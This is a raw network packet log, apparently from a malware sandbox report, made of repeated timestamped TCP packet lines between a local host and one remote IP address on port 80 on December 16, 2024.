                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.221965075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.222625017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.222853899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.222930908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.223642111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.223654032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.223747015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.224493027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.224999905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.225078106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.232553959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.232569933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.232686996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.232814074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.232954979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.233027935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.233766079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.233778954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.233860016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.234560966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.235305071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.235407114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.235541105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.235553980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.235605001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.236284018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.236819983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.236875057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.237127066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.237809896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.237858057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377326012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377346039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377510071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377569914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377706051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.377764940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.378449917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.378566027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.378643990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.379359961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.379421949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.379467010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.380249023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.380309105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.380357981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.381165028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.381310940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.381356955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.381994009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.382148981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.382235050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.382953882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.382966042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.383013964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.383878946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.383892059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.383934021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.384721041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.384733915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.384831905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.385472059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.386228085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.386324883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.386425018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.386435986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.386481047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.387275934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.387288094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.387343884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.388113022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.388309002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.388356924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.389060974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.389074087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.389118910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.389873981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.389959097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.390007019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.390805960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.390908003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.390954971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.391625881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.391917944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.391961098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.392467976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.392785072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.392833948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.393457890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.393471003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.393517971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.394395113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.394435883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.394519091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.395229101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.395325899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.395382881 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.396035910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.396131992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.396176100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.396891117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.396975040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.397022009 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.397756100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.397994041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.398140907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.398665905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.398807049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.398852110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.399491072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.399595976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.399642944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.400386095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.400489092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.400537014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.401256084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.401310921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.401355028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.402268887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.402285099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.402381897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.403116941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.403131008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.403177023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.403873920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.404203892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.404249907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.404839039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.405057907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.405102015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.405735970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.405750036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.405801058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.406565905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.406701088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.406786919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.407507896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.407521963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.407562971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.408395052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.408612967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.408663988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.409369946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.409384966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.409432888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.410166025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.410181046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.410232067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411065102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411077976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411120892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411791086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411900043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.411963940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.412739038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.412753105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.412791014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.413614035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.413625956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.413686037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.414438963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.414583921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.414668083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.415333033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.415380001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.415426016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.416193008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.416399002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.416445017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.417005062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.424496889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.424624920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.424910069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.424921989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.425017118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.425381899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.425973892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.426024914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.426122904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.426759958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.426809072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.426960945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.427123070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.427174091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.427886009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.428589106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.428638935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.428725004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.428837061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.428884983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.429970026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.480896950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569323063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569396973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569538116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569834948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569848061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.569931984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.570636034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.571355104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.571402073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.571465015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.571692944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.571744919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.572352886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.572546959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.572582960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.573287010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.573309898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.573450089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.574166059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.574525118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.574625015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.574990988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.575233936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.575309992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.575877905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.575979948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.576055050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.576880932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.576894045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.576991081 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.577611923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.577717066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.577795982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.578480005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.578632116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.578706980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.579391956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.579680920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.579755068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.580410004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.580421925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.580459118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.581149101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.581280947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.581317902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.582078934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.582091093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.582128048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583022118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583033085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583070040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583843946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583856106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.583945036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.584743977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.584757090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.584790945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.585495949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.585613012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.585649014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.586499929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.586513042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.586541891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.587287903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.587361097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.587444067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.588346004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.588357925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.588398933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.589006901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.589911938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.589924097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.589951992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.590080023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.590117931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591012001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591023922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591126919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591782093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591794014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.591906071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.592650890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.592663050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.592751980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.593449116 CET8049723185.81.68.147192.168.2.10
